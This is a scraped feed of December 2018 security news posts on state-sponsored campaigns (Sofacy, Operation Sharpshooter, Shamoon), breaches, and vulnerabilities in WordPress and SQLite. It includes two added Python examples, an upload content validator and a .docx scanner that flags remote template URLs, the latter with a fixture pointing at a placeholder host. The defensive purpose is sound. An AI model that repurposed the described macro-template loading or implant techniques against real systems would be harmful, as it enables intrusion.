Back on March 14, 2014, the DoD Chief Information Officer announced the DoD plans of implementing the National Institute of Standards and Technology (NIST) security controls to improve cybersecurity of systems.

More than four years later the situation is worrisome, according to a new DoD report the BMDS facilities have failed to implement security controls requested by the standard.

“We determined whether DoD Components implemented security controls and processes at DoD facilities to protect ballistic missile defense system (BMDS) technical information on classified networks from insider and external cyber threats.” reads the DoD report.

“We analyzed only classified networks because BMDS technical information was not managed on unclassified networks. The classified networks processed, stored, and transmitted both classified and unclassified BMDS technical information.”

The report states the BMDS did not implement security controls such as multifactor authentication, vulnerability assessment and mitigation, server rack security, protection of classified data stored on removable media, encrypting transmitted technical information, physical facility security such as cameras and sensors. Operators at BMDS facilities did not perform routine assessments to verify the level of cybersecurity implemented.

“We determined that officials from … the did not consistently implement security controls and processes to protect BMDS technical information.” continues the report.

In a BMDS facility, users used single-factor authentication for up to 14 days during account creation, in another facility users were allowed to access a system that does not even support multifactor authentication.

The report also shows failures in patch management for systems in many facilities. In some facilities, vulnerabilities were found that had not been patched since their discovery in 2013.

“Although the vulnerability was initially identified in 2013, the still had not mitigated the vulnerability by our review in April 2018. Of the unmitigated vulnerabilities, the included only in a POA&M and could not provide an explanation for not including the remaining vulnerabilities in its POA&M” continues the report.

According to the report, facilities were also failing to encrypt data stored on removable devices, and they failed to use systems that kept track of what data was being copied.

“In addition, officials did not encrypt data stored on removable media. The system owner for the [redacted] and the Information System Security Officer for [redacted] stated that their components did not encrypt data stored on removable media because the [redacted] did not require the use of encryption,” continues the report. “Although the [redacted] did not require data stored on removable media to be encrypted, system owners and Information System Security Officers have a responsibility to implement and enforce Federal and DoD cybersecurity policies and procedures for encrypting data stored on removable media. In May 2018, the [redacted] directed [redacted] to begin encrypting data stored on removable media using Federal Information Processing Standard 140-2 certified methods by October 9, 2018, as a condition to operate on the [redacted].”

The report also documented physical security issues such as server racks not being locked, open doors to restricted locations, and the absence of security cameras at required locations.

The report also includes the following recommendations: 

  • using multifactor authentication;
  • mitigating vulnerabilities in a timely manner;
  • protecting data on removable media;
  • implementing intrusion detection capabilities.

Pierluigi Paganini

(Security Affairs – United States’ ballistic missile defense systems (BMDS), DoD)

The post US ballistic missile defense systems (BMDS) open to cyber attacks appeared first on Security Affairs.

Security Affairs newsletter Round 192 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

STOLEN PENCIL campaign, hackers target academic institutions.
WordPress botnet composed of +20k installs targets other sites
A new Mac malware combines a backdoor and a crypto-miner
Duke-Cohan sentenced to three years in prison due to false bomb threats and DDoS
Expert devised a new WiFi hack that works on WPA/WPA2
Hackers defaced Linux.org with DNS hijack
Google will shut down consumer version of Google+ earlier due to a bug
Group-IB identifies leaked credentials of 40,000 users of government websites in 30 countries
Seedworm APT Group targeted more than 130 victims in 30 organizations since Sept
A new variant of Shamoon was uploaded to Virus Total while Saipem was under attack
Cyber attack hit the Italian oil and gas services company Saipem
New threat actor SandCat exploited recently patched CVE-2018-8611 0day
Novidade, a new Exploit Kit is targeting SOHO Routers
French foreign ministry announced its Travel Alert Registry Hack
ID Numbers for 120 Million Brazilians taxpayers exposed online
Operation Sharpshooter targets critical infrastructure and global defense
A bug in Facebook Photo API exposed photos of 6.8 Million users
New Sofacy campaign aims at Government agencies across the world
WordPress version 5.0.1 addressed several vulnerabilities
Magellan RCE flaw in SQLite potentially affects billions of apps
Which are the worst passwords for 2018?

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 192 – News of the week appeared first on Security Affairs.


Cyber Security Project Investment Proposal – DIA Needipedia – Fight Cybercrime and Cyber Jihad With Sensors – Grab Your Copy Today!

Dear blog readers, I decided to share with everyone a currently pending project investment proposal regarding the upcoming launch of a proprietary Technical Collection analysis platform with the project proposal draft available on request part of DIA's Needipedia Project Proposal Investment draft or eventually through the Smith Richardson Foundation. In case you're interested in working with me

Security Affairs: Twitter fixed bug could have exposed Direct Messages to third-party apps

Researcher Terence Eden discovered that the permissions dialog when authorizing certain apps to Twitter could expose direct messages to the third-party.

The flaw is triggered by apps that require a PIN to complete the authorization process instead of using the OAuth protocol. The expert discovered that some permissions, such as access to direct messages, remained hidden from the Twitter user.

Terence Eden was awarded $2,940 for reporting the bug to Twitter under the bug bounty program operated through the HackerOne platform. According to Eden, the bug resides in the way the official Twitter API handles keys and secrets that could be accessed by app developers even without the service’s authorization.

“Many years ago the official Twitter API keys were leaked. This means that app authors who can’t get their app approved by Twitter are still able to access the Twitter API.” wrote Eden.

“For some reason, Twitter’s OAuth screen says that these apps do not have access to Direct Messages. But they do!

In short, users could be tricked into allowing access to their DMs.”

Twitter implemented some restrictions, the most important one is restricting callback addresses. After successful login, the apps will only return to a predefined URL preventing the abuse of the official Twitter keys to send the user to your app.

The problem is that some apps don’t have a URL or don’t support callbacks. For these apps, Twitter has implemented an alternative authorisation mechanism: users log in, Twitter provides a PIN, and they type the PIN into their app.


In this alternative scenario, Eden discovered that the authorization screen did not show the correct OAuth details to the user; in particular, it stated that the app was not able to access direct messages, when in fact it could.

Below the bug timeline:

  • 2018-11-06 Submitted via HackerOne
  • 2018-11-06 Provided clarification and PoC. Issue accepted.
  • 2018-11-15 Proposed publication date of 30th November rejected due to US holidays.
  • 2018-11-16 Bug Bounty of $2,940 offered. Filled in the W2 form to say I’m not a US taxpayer.
  • 2018-11-17 Drank a fair amount of cider.
  • 2018-11-21 £2,287.05 deposited in my UK bank account. There was also the option of receiving it via PayPal.
  • 2018-12-06 Twitter fixed the issue and published the bounty payout. They let me know I was clear to publish.
  • 2018-12-14 Published this report.

Pierluigi Paganini

(Security Affairs – Twitter, hacking)

The post Twitter fixed bug could have exposed Direct Messages to third-party apps appeared first on Security Affairs.


Security Affairs: Which are the worst passwords for 2018?

Which are the worst passwords for 2018? SplashData report confirms that 123456 is the most used password for the 5th year in a row

Bad habits die hard: 123456 is the most used password for the 5th year in a row, followed by “password”.

Even though security experts continue to run awareness campaigns, people keep bad habits that expose their data to the risk of being hacked.

SplashData published for the 8th year in a row the worst passwords list, the annual report is based on the analysis of more than 5 million leaked passwords.

The 2018 top 10 most used passwords are:

  1. 123456
  2. password 
  3. 123456789
  4. 12345678
  5. 12345
  6. 111111
  7. 1234567 
  8. sunshine
  9. qwerty
  10. iloveyou

“Bad habits die hard, according to SplashData’s eighth annual list of Worst Passwords of the Year. After evaluating more than 5 million passwords leaked on the Internet, the company found that computer users continue using the same predictable, easily guessable passwords.” reads the press release published by SplashData.

“Using these passwords will put anyone at substantial risk of being hacked and having their identities stolen.” 

This year, President Trump appeared for the first time in the list of the worst passwords, with “donald” showing up as the 23rd most frequently used password.

Unfortunately, people are still using celebrity names, terms from pop culture and sports, and simple keyboard patterns, a gift for hackers that can use them to compromise their online accounts.

“Our hope by publishing this list each year is to convince people to take steps to protect themselves online,” said Morgan Slain, CEO of SplashData, Inc. “It’s a real head-scratcher that with all the risks known, and with so many highly publicized hacks such as Marriott and the National Republican Congressional Committee, that people continue putting themselves at such risk year-after-year.”

Experts suggest adopting strong passwords and using a unique password for every service. Passwords should contain at least 8 characters, upper and lower case letters, numbers, and symbols (e.g. %$#!).

Pierluigi Paganini

(Security Affairs – passwords, hacking)

The post Which are the worst passwords for 2018? appeared first on Security Affairs.


Magellan RCE flaw in SQLite potentially affects billions of apps

Security experts at Tencent’s Blade security team discovered the Magellan RCE flaw in SQLite database software that exposes billions of vulnerable apps.

Security experts at Tencent’s Blade security team have discovered a critical vulnerability in SQLite database software that exposes billions of vulnerable apps to hackers.

The vulnerability, tracked as ‘Magellan’, could allow remote attackers to execute arbitrary code on vulnerable devices, leak program memory or cause a DoS condition through an application crash.

“Magellan is a remote code execution vulnerability discovered by Tencent Blade Team that exists in SQLite. As a well-known database, SQLite is widely used in all modern mainstream operating systems and software, so this vulnerability has a wide range of influence. ” reads a blog post published by the Tencent Blade Team.

SQLite is a widely adopted relational database management system contained in a C programming library. Unlike many other database management systems, SQLite is not a client–server database engine. Rather, it is embedded into the end program.

SQLite is used by millions of applications with billions of installs, Magellan potentially affects IoT devices, macOS and Windows apps.

Experts also tested Chromium and discovered it was affected too, Google has confirmed and fixed this issue.

Chromium-based web browsers such as Google Chrome, Opera, Vivaldi, and Brave also support SQLite through the deprecated Web SQL database API.

Experts warn that a remote attacker can easily target people using vulnerable browsers by tricking them into visiting a specially crafted web page.

“After testing Chromium was also affected by this vulnerability, Google has confirmed and fixed this vulnerability. We will not disclose any details of the vulnerability at this time, and we are pushing other vendors to fix this vulnerability as soon as possible.” continues the post.

SQLite version 3.26.0 addresses the Magellan flaw. Google released Chromium version 71.0.3578.80 to fix the issue and rolled out the patched version to the latest versions of the Google Chrome and Brave web browsers.

The Tencent experts said they successfully built a proof-of-concept exploit using the Magellan flaw that worked against Google Home.

Experts did not disclose the exploit to allow development teams to address flawed applications. The good news is that experts have not seen attacks abusing the Magellan flaw yet.

Users and administrators have to update their systems and vulnerable applications as soon as possible.

Pierluigi Paganini

(Security Affairs – Magellan flaw, hacking)

The post Magellan RCE flaw in SQLite potentially affects billions of apps appeared first on Security Affairs.

Hackers bypassed Gmail & Yahoo’s 2FA to target US officials

By Waqas

The attack was carried out by the Iran-backed Charming Kitten hackers, and victims include dozens of US government officials. Private emails of US sanctions officials and nuclear scientists have been breached by Iranian state-sponsored hackers. As per the data obtained by Certfa, a cybersecurity firm based in London, the hacking group Charming Kitten is responsible for the […]

This is a post from HackRead.com. Read the original post: Hackers bypassed Gmail & Yahoo’s 2FA to target US officials

Chinese hackers reportedly hit Navy contractors with multiple attacks

Chinese hackers have been targeting US Navy contractors, and were reportedly successful on several occasions over the last 18 months. The infiltrators stole information including missile plans and ship maintenance data, according to a Wall Street Journal report that cites officials and security experts.

Source: Wall Street Journal

Security Affairs: WordPress version 5.0.1 addressed several vulnerabilities

This week, the WordPress development team released version 5.0.1 of the popular CMS on Thursday; it addresses several flaws.

The researcher Tim Coen discovered several cross-site scripting (XSS) vulnerabilities in the CMS. One of the flaws is caused by the ability of contributors to edit new comments from users with higher privileges.
Coen also discovered that it is possible to trigger XSS flaws by using specially crafted URL input against some plugins.

Coen, along with the researcher Slavco Mihajloski, discovered an XSS vulnerability that allows authors on websites running on Apache servers to upload specially crafted files that bypass the MIME verification.

“Prior to 5.0.1, WordPress did not require uploaded files to pass MIME type verification, so files could be uploaded even if the contents didn’t match the file extension. For example, a binary file could be uploaded with a .jpg extension,” wrote WordPress developer Ian Dunn. “This is no longer the case, and the content of uploaded files must now match their extension. Most valid files should be unaffected, but there may be cases when a file needs to be renamed to its correct extension (e.g., an OpenOffice doc going from .pptx to .ppxs).”
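One way to implement the content-versus-extension check that the quote above describes, as an added example in Python rather than WordPress’s own PHP code: the extension the uploader declares is compared with the format implied by the file’s leading bytes, and the upload is rejected when the two disagree or when the content matches nothing in the allowlist. The signature table and the sample inputs are constructed for this example; a production check would use libmagic or PHP’s fileinfo and a much fuller table.

```python
import os

# Leading bytes ("magic numbers") of a few common upload formats.
# Constructed for this example: a real deployment would use libmagic/fileinfo.
SIGNATURES = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"%PDF-": "pdf",
}

# Extensions that name the same format as a sniffed type.
ALIASES = {"jpeg": "jpg"}


def sniff_type(data):
    """Return the format implied by the file's leading bytes, or None."""
    for magic, kind in SIGNATURES.items():
        if data.startswith(magic):
            return kind
    return None


def claimed_type(filename):
    """Normalise the declared extension (case and jpeg/jpg alias)."""
    ext = os.path.splitext(filename)[1].lower().lstrip(".")
    return ALIASES.get(ext, ext)


def validate_upload(filename, data):
    """Accept an upload only when the declared extension is in the allowlist
    and agrees with the sniffed content. Returns (ok, reason)."""
    claimed = claimed_type(filename)
    if claimed not in SIGNATURES.values():
        return False, f"extension .{claimed} not in allowlist"
    actual = sniff_type(data)
    if actual is None:
        # e.g. a PE binary (starts with "MZ") renamed to .jpg: no known signature
        return False, "content does not match any known format"
    if actual != claimed:
        return False, f"content looks like {actual}, declared .{claimed}"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample uploads: one genuine JPEG header, one renamed binary,
    # one PDF renamed to .jpg, and one disallowed extension.
    samples = [
        ("photo.jpg", b"\xff\xd8\xff\xe0\x00\x10JFIF"),
        ("evil.jpg", b"MZ\x90\x00\x03\x00"),
        ("doc.jpg", b"%PDF-1.7\n"),
        ("notes.txt", b"just text"),
    ]
    for name, content in samples:
        print(name, validate_upload(name, content))
```

The check is deliberately allowlist-based: an extension that is not in the table is rejected before the content is even sniffed, which is what keeps a renamed binary out regardless of what its first bytes happen to be.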

Another flaw, discovered by experts at Yoast, affects some uncommon configurations and causes the user activation screen to be indexed by search engines. This could lead to the exposure of email addresses and some default passwords in “some rare cases.”

Karim El Ouerghemmi discovered a security issue that allows authors to alter metadata and delete files that they normally would not be authorized to delete.

Security expert Sam Thomas discovered that contributors could use specially crafted metadata for PHP object injection.

The last flaw was discovered by Simon Scannell from RIPS Technologies; it could be exploited by authors using specially crafted input to create posts of unauthorized types.

Security updates that addressed the above flaws have been released for WordPress 4.9 and older releases. Version 5.0 already includes the fixes.

Pierluigi Paganini

(Security Affairs – WordPress, security)

The post WordPress version 5.0.1 addressed several vulnerabilities appeared first on Security Affairs.


Security Affairs: New Sofacy campaign aims at Government agencies across the world

Security experts at Palo Alto Networks uncovered a new espionage campaign carried out by Russia-Linked APT group Sofacy.

The Russian cyber espionage group Sofacy (aka APT28, Pawn Storm, Fancy Bear, Sednit, Tsar Team, and Strontium) carried out a new cyber campaign aimed at government agencies on four continents in an attempt to infect them with malware.

The campaign has been focusing on Ukraine and NATO members like it has done in past attacks.

In early December the group used Brexit-themed bait documents on the same day the UK Prime Minister Theresa May announced the initial BREXIT draft agreement with the European Union (EU). In November experts at Palo Alto Networks documented a new malware, dubbed Cannon, used in attacks on government entities worldwide.

The latest campaign documented by Palo Alto Networks was carried out from mid-October through mid-November; attackers used both the Zebrocy backdoor and the Cannon Trojan.

Researchers noticed that in all the attacks the threat actors used decoy documents carrying the same author name, Joohn.

“The delivery documents used in the October and November waves shared a large number of similarities, which allowed us to cluster the activity together. Most notably, the author name Joohn was used repeatedly in each delivery document.” reads the analysis published by Palo Alto Networks.

“There was a slight deviation in the November grouping, where the three samples we collected still used the Joohn author name for the last modified field but reverted to a default USER/user author name for the creator field.”

Palo Alto Networks identified a total of 9 documents and associated payloads and targets.

Once a document is opened, it leverages Microsoft Word’s ability to retrieve a remote template, which then loads a malicious macro document.

“If the C2 server is active at the time the document is opened, it will successfully retrieve the malicious macro and load it in the same Microsoft Word session.” continues the report.

“The victim will then see a prompt to Enable Content as with any malicious macro document. If the C2 server is not active at this time, the download will fail and the victim will not receive a prompt to Enable Content as no macro is downloaded.”
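A defender-side check for the remote template technique described above, as an added example that is not part of Palo Alto Networks’ analysis: a .docx is an OOXML zip archive, and an attached template is declared as a relationship in word/_rels/settings.xml.rels, so a mail gateway or triage script can flag any attachedTemplate relationship whose TargetMode is External and whose target is a URL or UNC path. The fixture produced by build_sample_docx is constructed for this example (it contains only the entries the scanner inspects, not a real Word document), and the template location uses the reserved example.invalid domain as a placeholder.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
)
# The relationships part that holds the attached-template reference.
RELS_PATH = "word/_rels/settings.xml.rels"
# Targets that make Word fetch the template from somewhere other than the local disk.
REMOTE_TARGET = re.compile(r"(?i)^(https?|file)://|^\\\\")


def find_remote_templates(docx_bytes):
    """Return every external, remotely hosted attachedTemplate target in a .docx."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if RELS_PATH not in zf.namelist():
            return hits  # no settings relationships at all: nothing to load remotely
        root = ET.fromstring(zf.read(RELS_PATH))
        for rel in root.iter(f"{{{REL_NS}}}Relationship"):
            if rel.get("Type", "") != ATTACHED_TEMPLATE:
                continue
            target = rel.get("Target", "")
            # Internal targets point inside the package and cannot trigger a download.
            if rel.get("TargetMode", "Internal") == "External" and REMOTE_TARGET.match(target):
                hits.append(target)
    return hits


def build_sample_docx(template_target=None, external=True):
    """Constructed test fixture (not a real document): a minimal OOXML zip with
    an optional attachedTemplate relationship, so the scanner can be exercised offline."""
    rels = [
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>',
        f'<Relationships xmlns="{REL_NS}">',
    ]
    if template_target is not None:
        mode = ' TargetMode="External"' if external else ""
        rels.append(
            f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
            f'Target="{template_target}"{mode}/>'
        )
    rels.append("</Relationships>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types/>')
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr(RELS_PATH, "\n".join(rels))
    return buf.getvalue()


if __name__ == "__main__":
    # Placeholder template location on the reserved example.invalid domain.
    suspicious = build_sample_docx("http://example.invalid/template.dotm")
    print(find_remote_templates(suspicious))   # the placeholder URL is flagged
    print(find_remote_templates(build_sample_docx()))  # no template: []
```

Because the scan only reads the relationships part, it works whether or not the C2 host is up, which is exactly the case the report describes where the victim never sees an Enable Content prompt.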

Sofacy bait

The latest Sofacy campaign hit targets around the world, including a foreign affairs organization in North America, foreign affairs organizations in Europe, as well as government entities in former USSR states. Experts also discovered evidence of possible targeting of local law enforcement agencies worldwide (i.e., North America, Australia, and Europe).

Palo Alto Networks reveals that, in addition to the delivery documents themselves, the remote templates too shared a common author name. The security researchers also noticed that the servers hosting the remote templates also hosted the C&C for the first-stage payloads.

Sofacy attackers used different variants of the Zebrocy malware and the Cannon backdoor. Palo Alto Networks identified a Cannon variant written in Delphi and variants of Zebrocy written in C# and VB.NET.

“The Sofacy group continues their attacks on organizations across the globe using similar tactics and techniques.” concludes the analysis.

“The group clearly shows a preference for using a simple downloader like Zebrocy as first-stage payloads in these attacks. The group continues to develop new variations of Zebrocy by adding a VB.NET and C# version, and it appears that they also have used different variants of the Cannon tool in past attack campaigns.”

Pierluigi Paganini

(Security Affairs – Sofacy, cyber espionage)

The post New Sofacy campaign aims at Government agencies across the world appeared first on Security Affairs.


IT consultancy firm caught running ransomware decryption scam

By Waqas

Ransomware has become a persistent threat to users globally but for cybercriminals, it is a lucrative business. Recently, IT security researchers at Check Point unearthed a sophisticated ransomware decryption scam in which a Russian IT consultant company has been caught scamming ransomware victims. The company according to Check Point researchers calls itself ‘Dr. Shifro’ and claims to provide […]

This is a post from HackRead.com. Read the original post: IT consultancy firm caught running ransomware decryption scam

French foreign ministry announced its Travel Alert Registry Hack

The French foreign ministry announced today that its travel alert registry website had been hacked and personal data of citizens “could be misused”.

The French foreign ministry confirmed that hackers breached the Ariane system, its travel alert registry website, and that personal data of citizens “could be misused”.

The Ariane system provides security alerts to registered users when traveling abroad. At the time of writing there are no technical details about the intrusion or the number of affected people.

“Users reported receiving emails notifying them that their names, cellphone numbers and email addresses may have been stolen, but the ministry said none of the data was “sensitive” or “of a financial nature”.” reported the AFP press.

The statement did not indicate who might be behind the attack.

The ministry has started notifying the affected users of the incident, and it also told the media it has taken the necessary measures to avoid similar incidents in the future.

“We immediately took the necessary measures to ensure this type of incident would not happen again,” it said.

The Ministry confirmed that the site was now secured.

Pierluigi Paganini

(Security Affairs – Travel Alert Registry, hacking)

The post French foreign ministry announced its Travel Alert Registry Hack appeared first on Security Affairs.

Operation Sharpshooter targets critical infrastructure and global defense

McAfee uncovered a campaign tracked as Operation Sharpshooter that hit at least 87 organizations in global defense and critical infrastructure.

Security experts at McAfee uncovered a hacking campaign, tracked as Operation Sharpshooter, aimed at infrastructure companies worldwide. The threat actors are using malware associated with the Lazarus APT group, which carried out the Sony Pictures attack back in 2014.

The current campaign is targeting nuclear, defense, energy, and financial companies; experts believe the attackers are gathering intelligence to prepare future attacks.

“In October and November 2018, the Rising Sun implant has appeared in 87 organizations across the globe, predominantly in the United States, based on McAfee telemetry and our analysis.” reads the analysis published by McAfee.

“Based on other campaigns with similar behavior, most of the targeted organizations are English speaking or have an English-speaking regional office. This actor has used recruiting as a lure to collect information about targeted individuals of interest or organizations that manage data related to the industries of interest.”

Operation Sharpshooter

Threat actors are carrying out spear phishing attacks with a link pointing to weaponized Word documents purporting to be sent by a job recruiter. The messages are in English and include descriptions for jobs at unknown companies; the URLs associated with the documents belong to a US-based IP address and to the Dropbox service.

The macros included in the malicious document use an embedded shellcode to inject the Sharpshooter downloader into Word’s memory.

The macros act as a downloader for a second-stage implant dubbed Rising Sun that runs in memory and collects intelligence about the machine (network adapter information, computer name, username, IP address information, OS information, drive and process information, and other native system data).
Rising Sun implements dozens of backdoor capabilities, including the ability to terminate processes and write files to disk.

The binary is downloaded to the startup folder to gain persistence on the infected system. Experts observed that the attackers behind Operation Sharpshooter also download a second, harmless Word document from the control server, most likely as a decoy to hide the malware.

The malware sends collected data to the C2 in an encrypted format, it uses the RC4 algorithm and encodes the encrypted data with Base64.

The control infrastructure is composed of servers located in the US, Singapore, and France.

Experts highlighted that the Rising Sun uses source code from Trojan Duuzer, a backdoor used by Lazarus Group in Sony attacks.

“This campaign, Operation Sharpshooter, leverages an in-memory implant to download and retrieve a second-stage implant—which we call Rising Sun—for further exploitation. According to our analysis, the Rising Sun implant uses source code from the Lazarus Group’s 2015 backdoor Trojan Duuzer in a new framework to infiltrate these key industries.” continues the report.

Experts found other similarities, for example the documents that are being used to distribute Rising Sun contain metadata indicating they were created using a Korean-language version of Word.

Experts found many similarities between the malware used in Operation Sharpshooter and the one used in the Sony hack; they also found similarities in the tactics, techniques, and procedures used by the attackers and by the Lazarus Group.

Experts believe that threat actors behind Operation Sharpshooter are planting false flags to make attribution more difficult.

Further details on the campaign, including IoCs, are reported in the analysis published by McAfee.

Pierluigi Paganini

(Security Affairs – Operation Sharpshooter, hacking)



The post Operation Sharpshooter targets critical infrastructure and global defense appeared first on Security Affairs.

Marriott Hack Reported as Chinese State-Sponsored

The New York Times and Reuters are reporting that China was behind the recent hack of Marriott Hotels. Note that this is still unconfirmed, but interesting if it is true.

Reuters:

Private investigators looking into the breach have found hacking tools, techniques and procedures previously used in attacks attributed to Chinese hackers, said three sources who were not authorized to discuss the company's private probe into the attack.

That suggests that Chinese hackers may have been behind a campaign designed to collect information for use in Beijing's espionage efforts and not for financial gain, two of the sources said.

While China has emerged as the lead suspect in the case, the sources cautioned it was possible somebody else was behind the hack because other parties had access to the same hacking tools, some of which have previously been posted online.

Identifying the culprit is further complicated by the fact that investigators suspect multiple hacking groups may have simultaneously been inside Starwood's computer networks since 2014, said one of the sources.

I used to have opinions about whether these attributions are true or not. These days, I tend to wait and see.

ID Numbers for 120 Million Brazilians taxpayers exposed online

InfoArmor discovered a misconfigured server online that contained taxpayer identification numbers for 120 million Brazilian taxpayers.

In March 2018, security experts at InfoArmor discovered a misconfigured server online that contained taxpayer identification numbers, or Cadastro de Pessoas Físicas (CPFs), for 120 million Brazilian nationals. It is not clear how long the data remained exposed online or who accessed it.

Every Brazilian national is assigned a taxpayer identification number that allows them to perform ordinary operations, such as opening a bank account, paying taxes, or getting a loan.

Experts discovered the file index.html_bkp on the Apache server (likely a backup of the index.html); with no index.html present, the web server displayed a listing of the files and folders stored in that directory and allowed them to be downloaded.

The folder included data archives ranging in size from 27 megabytes to 82 gigabytes.

Experts at InfoArmor discovered that one of the archives contained data related to Cadastro de Pessoas Físicas (CPFs), personal information, military info, telephone numbers, loans, and addresses.

“CPFs are an identification number issued by the Brazilian Federal Reserve to Brazilian citizens and tax-paying resident aliens, and each exposed CPF linked to an individual’s banks, loans, repayments, credit and debit history, voting history, full name, emails, residential addresses, phone numbers, date of birth, family contacts, employment, voting registration numbers, contract numbers, and contract amounts.” reads the report published by InfoArmor.

Brazilian taxpayer directory listing


Experts believe that the directory was used to store database backups. While InfoArmor was attempting to report the discovery to the owner of the database, someone replaced the 82 GB file with a raw 25 GB .sql file.

“In the days following the initial discovery, InfoArmor’s research team attempted to determine who owned the server so they could be notified. During this time, InfoArmor observed that one of the files, an 82 GB file, had been replaced by a raw .sql file 25 GB in size, though its filename remained the same.” continues the report.

“This swap suggests a human intervened. It is possible that a server administrator had discovered the leak, however the server remained unsecured for weeks after this swap.”

InfoArmor was in any case able to contact the hosting provider, which secured the directory by the end of March.

One question remains unanswered: why this kind of data was exposed on a third-party server.

“It is safe to assume that any intelligence organization or cybercrime group with reasonable collection capabilities and expertise will have captured this data. This data could very likely be used against the population of Brazil, the nation of Brazil, or any nations hosting people who have a CPF.” concludes InfoArmor.

Pierluigi Paganini

(Security Affairs – Brazilian Taxpayers, data leak)

The post ID Numbers for 120 Million Brazilians taxpayers exposed online appeared first on Security Affairs.

A New Year’s Resolution: Security is Broken…Let’s Fix It

As we near the end of 2018, another wave of massive cyber-attacks has exposed personally identifiable information belonging to hundreds of millions of people and will cost the impacted businesses

The post A New Year’s Resolution: Security is Broken…Let’s Fix It appeared first on The Cyber Security Place.

A new variant of Shamoon was uploaded to Virus Total while Saipem was under attack

A new variant of the Shamoon malware, aka DistTrack, was uploaded to VirusTotal from Italy this week, but experts haven’t linked it to a specific attack yet.

Shamoon was first observed in 2012 when it infected and wiped more than 30,000 systems at Saudi Aramco and other oil companies in the Middle East.

Four years later, a new version (Shamoon 2) appeared in the threat landscape, it was involved in a string of cyber attacks aimed at various organizations in the Persian Gulf, including Saudi Arabia’s General Authority of Civil Aviation (GACA). 

A second variant of the same threat was discovered by researchers at Palo Alto Networks in January 2017 and it was able to target virtualization products.

DistTrack is able to wipe data from hard drives of the infected systems and render systems unusable. Like other malware, Shamoon leverages Windows Server Message Block (SMB) to spread among systems of the target network.

The code of the original Shamoon includes a list of hard-coded domain credentials used to target a specific organization and steal credentials, but the variant uploaded to VirusTotal this week doesn’t contain these credentials.

Google’s security firm Chronicle discovered a file containing Shamoon uploaded to its VirusTotal database.

“The new Shamoon was set to detonate on Dec. 7, 2017, at 11:51 pm, but only uploaded yesterday.” reported the Axios website.

“Chronicle notes that attackers may have set the attack date to the past — perhaps by changing 2018 to 2017 — in order to start an attack immediately. Another possibility, said Brandon Levene, head of applied intelligence at Chronicle, is that the malware was compiled in the past as part of preparations for a later attack.”

Unlike Shamoon 2, the new version contains a much longer filename list used for selecting a dropped executable name. The new list does not overlap with previously observed versions of Shamoon.

The new variant presents other anomalies; for example, the list of command and control servers was blank. Experts at Chronicle believe that the attackers may have a different connection to the host network and install Shamoon manually.

Another difference is that Shamoon in the past has replaced all files with images that had political significance. The latest variant irreversibly encrypts the files.

The file was uploaded to VirusTotal from Italy, and the malicious files were discovered at around the time the Italian oil services company Saipem announced it had suffered a cyber attack.

“While Chronicle cannot directly link the new Shamoon variant to an active attack, the timing of the malware files comes close to news of an attack on an Italian energy corporation with assets in the Middle East.” Chronicle noted in a statement.

Pierluigi Paganini

(Security Affairs – Wiper, malware)

The post A new variant of Shamoon was uploaded to Virus Total while Saipem was under attack appeared first on Security Affairs.

Cyber attack hit the Italian oil and gas services company Saipem

Some of the servers of the Italian oil and gas services company Saipem were hit by a cyber attack early this week.

Saipem has customers in more than 60 countries, including Saudi Arabian oil and gas giant Saudi Aramco. It could be considered a strategic target for a broad range of threat actors.

The attack was identified on Monday as originating from India and primarily affected servers in the Middle East, including Saudi Arabia, the United Arab Emirates, and Kuwait.

The main operating centers in Italy, France and Britain were not affected.

The attack affected only a limited number of servers in its infrastructure; Saipem said it is working to restore them from backups, a circumstance that could suggest that ransomware hit the company.

Saipem told Reuters the attack originated in Chennai, India, but the identity of the attackers is unknown.

“The servers involved have been shut down for the time being to assess the scale of the attack,” Saipem’s head of digital and innovation, Mauro Piasere, told Reuters.

“There has been no loss of data because all our systems have back-ups,” he added.

Saipem

The Italian oil services company Saipem was hit by a cyber attack; it confirmed the event but has shared only a few details about the attack.

“We have no proof of the origins or reasons for the attack, though this is being investigated,” a Saipem spokesperson said via email.

“We are collecting all the elements useful for assessing the impact on our infrastructures and the actions to be taken to restore normal activities,” the firm said in a statement.

At the time of writing it is impossible to attribute the attack; it is not clear whether the company faced a targeted attack or was hit in a broader campaign carried out by threat actors.

We cannot exclude that attackers hit the company to target its business partners too, for example, Saudi Aramco that suffered Shamoon attacks in 2012 and 2016.

Saipem told media it was reporting the incident to the competent authorities.

Pierluigi Paganini

(Security Affairs – energy industry, cyber attack)

The post Cyber attack hit the Italian oil and gas services company Saipem appeared first on Security Affairs.

Nasty Android malware found stealing its victims’ PayPal funds

By Waqas

Another day, another Android malware – This time, according to the latest findings of ESET’s IT security researchers, there is a new malware in Google Play Store that hijacks PayPal account to steal money – Researchers assessed that the malware is specifically targeting Android users and steals no less than $1,000. The malware was first […]

This is a post from HackRead.com. Read the original post: Nasty Android malware found stealing its victims’ PayPal funds

New threat actor SandCat exploited recently patched CVE-2018-8611 0day

Experts from Kaspersky Lab reported that the recently patched Windows kernel zero-day vulnerability (CVE-2018-8611) has been exploited by several threat actors.

Microsoft’s Patch Tuesday updates for December 2018 address nearly 40 flaws, including a zero-day vulnerability affecting the Windows kernel.

The flaw, tracked as CVE-2018-8611, is a privilege escalation flaw caused by the failure of the Windows kernel to properly handle objects in memory.

“An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.” reads the security advisory published by Microsoft.

